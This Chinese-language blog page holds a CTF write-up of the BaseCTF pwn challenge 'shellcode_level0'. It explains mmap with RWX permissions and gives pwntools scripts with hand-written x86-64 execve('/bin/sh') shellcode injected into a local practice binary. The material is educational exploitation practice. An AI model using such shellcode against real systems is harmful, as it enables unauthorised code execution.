<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width">
<meta name="theme-color" content="#222"><meta name="generator" content="Hexo 7.3.0">

  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">



<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.7.2/css/all.min.css" integrity="sha256-dABdfBfUoC8vJUBOwGVdm8L9qlMWaHTIfXt+7GnZCIo=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/animate.css/3.1.1/animate.min.css" integrity="sha256-PR7ttpcvz8qrF57fur/yAx1qXMFJeJFiA6pSzWi0OIE=" crossorigin="anonymous">

<script class="next-config" data-name="main" type="application/json">{"hostname":"maple-pwn.github.io","root":"/","images":"/images","scheme":"Muse","darkmode":false,"version":"8.23.0","exturl":false,"sidebar":{"position":"left","width_expanded":320,"width_dual_column":240,"display":"post","padding":18,"offset":12},"hljswrap":true,"copycode":{"enable":false,"style":null},"fold":{"enable":false,"height":500},"bookmark":{"enable":false,"color":"#222","save":"auto"},"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"stickytabs":false,"motion":{"enable":true,"async":false,"duration":200,"transition":{"menu_item":"fadeInDown","post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"i18n":{"placeholder":"搜索...","empty":"没有找到任何搜索结果：${query}","hits_time":"找到 ${hits} 个搜索结果（用时 ${time} 毫秒）","hits":"找到 ${hits} 个搜索结果"}}</script><script src="/js/config.js" defer></script>

    <meta name="description" content="Basectf pwn方向“shellcode_level0”by Maple 题目的提示很明显，就是shellcode，反编译发现直接通过mmap函数输入,权限为7，所以直接注入shellcode就行 1234from pwn import *p &#x3D; process(&#x27;.&#x2F;shellcode_level0&#x27;)p.send(asm(shellcraft.sh()))p.inte">
<meta property="og:type" content="article">
<meta property="og:title" content="Maple">
<meta property="og:url" content="http://maple-pwn.github.io/2025/04/04/basectf/4th_shellcode_level0/shellcode_level0/index.html">
<meta property="og:site_name" content="Maple">
<meta property="og:description" content="Basectf pwn方向“shellcode_level0”by Maple 题目的提示很明显，就是shellcode，反编译发现直接通过mmap函数输入,权限为7，所以直接注入shellcode就行 1234from pwn import *p &#x3D; process(&#x27;.&#x2F;shellcode_level0&#x27;)p.send(asm(shellcraft.sh()))p.inte">
<meta property="og:locale" content="zh_CN">
<meta property="article:published_time" content="2025-04-03T17:34:36.657Z">
<meta property="article:modified_time" content="2025-02-11T08:36:58.331Z">
<meta property="article:author" content="Maple">
<meta name="twitter:card" content="summary">


<link rel="canonical" href="http://maple-pwn.github.io/2025/04/04/basectf/4th_shellcode_level0/shellcode_level0/">


<script class="next-config" data-name="page" type="application/json">{"sidebar":"","isHome":false,"isPost":true,"lang":"zh-CN","comments":true,"permalink":"http://maple-pwn.github.io/2025/04/04/basectf/4th_shellcode_level0/shellcode_level0/","path":"2025/04/04/basectf/4th_shellcode_level0/shellcode_level0/","title":""}</script>

<script class="next-config" data-name="calendar" type="application/json">""</script>
<title> | Maple</title>
  








  
  <script src="https://cdnjs.cloudflare.com/ajax/libs/animejs/3.2.1/anime.min.js" integrity="sha256-XL2inqUJaslATFnHdJOi9GfQ60on8Wx1C2H8DYiN1xY=" crossorigin="anonymous" defer></script>
<script src="/js/utils.js" defer></script><script src="/js/motion.js" defer></script><script src="/js/sidebar.js" defer></script><script src="/js/next-boot.js" defer></script>

  






  





  <noscript>
    <link rel="stylesheet" href="/css/noscript.css">
  </noscript>
</head>

<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
  <div class="headband"></div>

  <main class="main">
    <div class="column">
      <header class="header" itemscope itemtype="http://schema.org/WPHeader"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏" role="button">
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <i class="logo-line"></i>
      <p class="site-title">Maple</p>
      <i class="logo-line"></i>
    </a>
      <p class="site-subtitle" itemprop="description">Maple’s Blog</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger" aria-label="搜索" role="button">
    </div>
  </div>
</div>







</header>
        
  
  <aside class="sidebar">

    <div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <div class="sidebar-panel-container">
        <!--noindex-->
        <div class="post-toc-wrap sidebar-panel">
            <div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#Basectf-pwn%E6%96%B9%E5%90%91%E2%80%9Cshellcode-level0%E2%80%9D"><span class="nav-number">1.</span> <span class="nav-text">Basectf pwn方向“shellcode_level0”</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#asm-shellcraft-sh"><span class="nav-number">1.1.</span> <span class="nav-text">asm(shellcraft.sh())</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#mmap"><span class="nav-number">1.2.</span> <span class="nav-text">mmap()</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%89%8B%E5%86%99shellcode"><span class="nav-number">1.3.</span> <span class="nav-text">手写shellcode</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E8%BF%99%E9%87%8C%E4%B8%BA%E4%BB%80%E4%B9%88%E6%98%AFsend%E8%80%8C%E4%B8%8D%E6%98%AFsendline"><span class="nav-number">1.4.</span> <span class="nav-text">这里为什么是send而不是sendline</span></a></li></ol></li></ol></div>
        </div>
        <!--/noindex-->

        <div class="site-overview-wrap sidebar-panel">
          <div class="site-author animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">Maple</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
        <a href="/archives/">
          <span class="site-state-item-count">44</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
  </nav>
</div>

        </div>
      </div>
    </div>

    
  </aside>


    </div>

    <div class="main-inner post posts-expand">


  


<div class="post-block">
  
  

  <article itemscope itemtype="http://schema.org/Article" class="post-content" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://maple-pwn.github.io/2025/04/04/basectf/4th_shellcode_level0/shellcode_level0/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="Maple">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Maple">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="post" itemscope itemtype="http://schema.org/CreativeWork">
      <meta itemprop="name" content=" | Maple">
      <meta itemprop="description" content="">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          
        </h1>

        <div class="post-meta-container">
          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">发表于</span>

      <time title="创建时间：2025-04-04 01:34:36" itemprop="dateCreated datePublished" datetime="2025-04-04T01:34:36+08:00">2025-04-04</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar-check"></i>
      </span>
      <span class="post-meta-item-text">更新于</span>
      <time title="修改时间：2025-02-11 16:36:58" itemprop="dateModified" datetime="2025-02-11T16:36:58+08:00">2025-02-11</time>
    </span>

  
</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody"><h1 id="Basectf-pwn方向“shellcode-level0”"><a href="#Basectf-pwn方向“shellcode-level0”" class="headerlink" title="Basectf pwn方向“shellcode_level0”"></a>Basectf pwn方向“shellcode_level0”</h1><p>by Maple</p>
<p>题目的提示很明显，就是shellcode，反编译发现直接通过mmap函数输入,权限为7，所以直接注入shellcode就行</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">p = process(<span class="string">&#x27;./shellcode_level0&#x27;</span>)</span><br><span class="line">p.send(asm(shellcraft.sh()))</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>

<h2 id="asm-shellcraft-sh"><a href="#asm-shellcraft-sh" class="headerlink" title="asm(shellcraft.sh())"></a>asm(shellcraft.sh())</h2><p><code>shellcraft.sh()</code>是一个生成shellcode的函数;<code>asm()</code>函数将shellcode汇编成机器码。</p>
<h2 id="mmap"><a href="#mmap" class="headerlink" title="mmap()"></a>mmap()</h2><p><code>mmap()</code>的函数原型是<code>void *mmap(void *addr, size_t length, int prot, int flags, int fd, off_t offset);</code></p>
<ul>
<li><strong>void addr</strong> 指定内存映射区的起始地址。通常设置为NULL,让系统自动选择合适的地址。如果指定地址，需要确保地址对齐，并且有足够的空间</li>
<li><strong>size_t length</strong>:映射区的长度，以字节为单位</li>
<li><strong>prot</strong>:指定内存区域的保护属性<ul>
<li>PROT_READ：区域可读(0x1)</li>
<li>PROT_WRITE：区域可写(0x2)</li>
<li>PROT_EXEC：区域可执行(0x4)</li>
<li>PROT_NONE；区域不可访问</li>
</ul>
</li>
<li><strong>flags</strong>:指定映射对象的类型和可见性<ul>
<li>MAP_PRIVATE：创建一个写入时复制（copy-on-write）的私有映射。对映射区域的修改不会反映到原始文件中。（0x02）</li>
<li>MAP_SHARED：创建一个共享映射。对映射区域的修改会反映到原始文件中。(0X01)</li>
<li>MAP_ANONYMOUS：创建一个匿名映射，不与任何文件关联（0x20）</li>
</ul>
</li>
<li><strong>fd</strong>: 文件描述符，用于指定要映射的文件。如果使用MAP_ANONYMOUS，则此参数通常设置为-1</li>
<li><strong>offset</strong>：文件中的偏移量，指定从文件的哪个位置开始映射。通常需要是页大小的整数倍</li>
</ul>
<p>这道题的mmap函数调用为<code>buf = mmap(0LL, 0x1000uLL, 7, 34, -1, 0LL)</code></p>
<p>让系统自主选择地址</p>
<p>映射区长度为0x1000uLL（4096字节）</p>
<p>保护属性为7（PROT_READ | PROT_WRITE | PROT_EXEC）：可读可写可执行</p>
<p>flags为34（MAP_PRIVATE | MAP_ANONYMOUS）：创建一个私有的匿名映射</p>
<h2 id="手写shellcode"><a href="#手写shellcode" class="headerlink" title="手写shellcode"></a>手写shellcode</h2><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">p = process(<span class="string">&#x27;./shellcode_level0&#x27;</span>)</span><br><span class="line"></span><br><span class="line">shellcode = asm(<span class="string">&#x27;&#x27;&#x27;</span></span><br><span class="line"><span class="string">    mov rax,0x68732f6e69622f</span></span><br><span class="line"><span class="string">    push rax</span></span><br><span class="line"><span class="string">    push rsp</span></span><br><span class="line"><span class="string">    pop rdi</span></span><br><span class="line"><span class="string">    push 0x3b</span></span><br><span class="line"><span class="string">    pop rax</span></span><br><span class="line"><span class="string">    xor esi, esi</span></span><br><span class="line"><span class="string">    xor edx, edx</span></span><br><span class="line"><span class="string">    syscall</span></span><br><span class="line"><span class="string">&#x27;&#x27;&#x27;</span>)</span><br><span class="line"></span><br><span class="line">p.send(shellcode)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>

<h2 id="这里为什么是send而不是sendline"><a href="#这里为什么是send而不是sendline" class="headerlink" title="这里为什么是send而不是sendline"></a>这里为什么是send而不是sendline</h2><p>其实写sendline也没问题，不会影响这个脚本的运行,如果深究的话，我认为是这些原因</p>
<ol>
<li>发送的是shellcode：<code>asm(shellcraft.sh())</code>生成的是机器码（二进制数据），而不是文本命令。shellcode通常不需要换行符来触发执行，因为它本身就是一段可执行的机器指令</li>
<li>精确控制数据：使用send可以确保发送的数据完全是你生成的shellcode，没有任何额外的字符（如换行符）被添加。这可以确保shellcode正确执行。</li>
</ol>
<p><em>注意，有些题目写send或sendline得到的结果是完全不同的，但后面遇到再说吧</em>.</p>

    </div>

    
    
    

    <footer class="post-footer">

        

          <div class="post-nav">
            <div class="post-nav-item">
                <a href="/2025/04/04/basectf/3st_%E5%BD%BB%E5%BA%95%E5%A4%B1%E5%8E%BB%E4%BB%96/cdsqt/" rel="prev" title="">
                  <i class="fa fa-angle-left"></i> 
                </a>
            </div>
            <div class="post-nav-item">
                <a href="/2025/04/04/basectf/5th_%E5%A5%B9%E4%B8%8E%E4%BD%A0%E7%9A%86%E5%A4%B1/tynjs/tynjs/" rel="next" title="">
                   <i class="fa fa-angle-right"></i>
                </a>
            </div>
          </div>
    </footer>
  </article>
</div>






</div>
  </main>

  <footer class="footer">
    <div class="footer-inner">

  <div class="copyright">
    &copy; 
    <span itemprop="copyrightYear">2025</span>
    <span class="with-love">
      <i class="fa fa-heart"></i>
    </span>
    <span class="author" itemprop="copyrightHolder">Maple</span>
  </div>
  <div class="powered-by">由 <a href="https://hexo.io/" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.js.org/muse/" rel="noopener" target="_blank">NexT.Muse</a> 强力驱动
  </div>

    </div>
  </footer>

  
  <div class="toggle sidebar-toggle" role="button">
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
  </div>
  <div class="sidebar-dimmer"></div>
  <div class="back-to-top" role="button" aria-label="返回顶部">
    <i class="fa fa-arrow-up fa-lg"></i>
    <span>0%</span>
  </div>

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>

</body>
</html>
